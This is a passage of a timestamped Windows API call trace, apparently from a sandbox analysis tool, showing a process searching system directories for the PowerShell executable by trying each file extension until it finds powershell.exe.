	[0536.561] SetErrorMode (uMode=0x1) returned 0x1
	[0536.562] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.562] SetErrorMode (uMode=0x1) returned 0x1
	[0536.562] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.562] SetErrorMode (uMode=0x1) returned 0x1
	[0536.562] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.562] SetErrorMode (uMode=0x1) returned 0x1
	[0536.562] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.563] SetErrorMode (uMode=0x1) returned 0x1
	[0536.563] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.563] SetErrorMode (uMode=0x1) returned 0x1
	[0536.563] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.563] SetErrorMode (uMode=0x1) returned 0x1
	[0536.563] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.564] SetErrorMode (uMode=0x1) returned 0x1
	[0536.564] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.564] SetErrorMode (uMode=0x1) returned 0x1
	[0536.564] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.564] SetErrorMode (uMode=0x1) returned 0x1
	[0536.564] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.565] SetErrorMode (uMode=0x1) returned 0x1
	[0536.565] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.565] SetErrorMode (uMode=0x1) returned 0x1
	[0536.565] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.565] SetErrorMode (uMode=0x1) returned 0x1
	[0536.565] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.566] SetErrorMode (uMode=0x1) returned 0x1
	[0536.566] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.566] SetErrorMode (uMode=0x1) returned 0x1
	[0536.566] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.566] SetErrorMode (uMode=0x1) returned 0x1
	[0536.566] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.566] SetErrorMode (uMode=0x1) returned 0x1
	[0536.567] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0536.567] SetErrorMode (uMode=0x1) returned 0x1
	[0536.567] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.567] SetErrorMode (uMode=0x1) returned 0x1
	[0536.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.567] SetErrorMode (uMode=0x1) returned 0x1
	[0536.568] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.568] SetErrorMode (uMode=0x1) returned 0x1
	[0536.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.568] SetErrorMode (uMode=0x1) returned 0x1
	[0536.568] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.568] SetErrorMode (uMode=0x1) returned 0x1
	[0536.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.569] SetErrorMode (uMode=0x1) returned 0x1
	[0536.569] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.569] SetErrorMode (uMode=0x1) returned 0x1
	[0536.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.569] SetErrorMode (uMode=0x1) returned 0x1
	[0536.569] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.570] SetErrorMode (uMode=0x1) returned 0x1
	[0536.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.570] SetErrorMode (uMode=0x1) returned 0x1
	[0536.570] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.570] SetErrorMode (uMode=0x1) returned 0x1
	[0536.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.571] SetErrorMode (uMode=0x1) returned 0x1
	[0536.571] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.571] SetErrorMode (uMode=0x1) returned 0x1
	[0536.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.571] SetErrorMode (uMode=0x1) returned 0x1
	[0536.571] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.571] SetErrorMode (uMode=0x1) returned 0x1
	[0536.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.572] SetErrorMode (uMode=0x1) returned 0x1
	[0536.572] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.572] SetErrorMode (uMode=0x1) returned 0x1
	[0536.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.572] SetErrorMode (uMode=0x1) returned 0x1
	[0536.573] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.573] SetErrorMode (uMode=0x1) returned 0x1
	[0536.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.573] SetErrorMode (uMode=0x1) returned 0x1
	[0536.573] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.573] SetErrorMode (uMode=0x1) returned 0x1
	[0536.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.574] SetErrorMode (uMode=0x1) returned 0x1
	[0536.574] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.574] SetErrorMode (uMode=0x1) returned 0x1
	[0536.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.574] SetErrorMode (uMode=0x1) returned 0x1
	[0536.574] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.575] SetErrorMode (uMode=0x1) returned 0x1
	[0536.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.575] SetErrorMode (uMode=0x1) returned 0x1
	[0536.575] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.575] SetErrorMode (uMode=0x1) returned 0x1
	[0536.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.576] SetErrorMode (uMode=0x1) returned 0x1
	[0536.576] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.576] SetErrorMode (uMode=0x1) returned 0x1
	[0536.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0536.576] SetErrorMode (uMode=0x1) returned 0x1
	[0536.576] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.577] SetErrorMode (uMode=0x1) returned 0x1
	[0536.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0536.577] SetErrorMode (uMode=0x1) returned 0x1
	[0536.577] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.577] SetErrorMode (uMode=0x1) returned 0x1
	[0536.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0536.578] SetErrorMode (uMode=0x1) returned 0x1
	[0536.578] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.578] SetErrorMode (uMode=0x1) returned 0x1
	[0536.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0536.578] SetErrorMode (uMode=0x1) returned 0x1
	[0536.578] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.579] SetErrorMode (uMode=0x1) returned 0x1
	[0536.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0536.579] SetErrorMode (uMode=0x1) returned 0x1
	[0536.579] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0536.579] SetErrorMode (uMode=0x1) returned 0x1
	[0536.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c80dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0536.580] SetErrorMode (uMode=0x1) returned 0x1
	[0536.580] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c80dea0 | out: lpFindFileData=0x1c80dea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x3a6790
	[0537.535] FindNextFileW (in: hFindFile=0x3a6790, lpFindFileData=0x1c80deb0 | out: lpFindFileData=0x1c80deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0537.536] FindClose (in: hFindFile=0x3a6790 | out: hFindFile=0x3a6790) returned 1
	[0537.536] SetErrorMode (uMode=0x1) returned 0x1
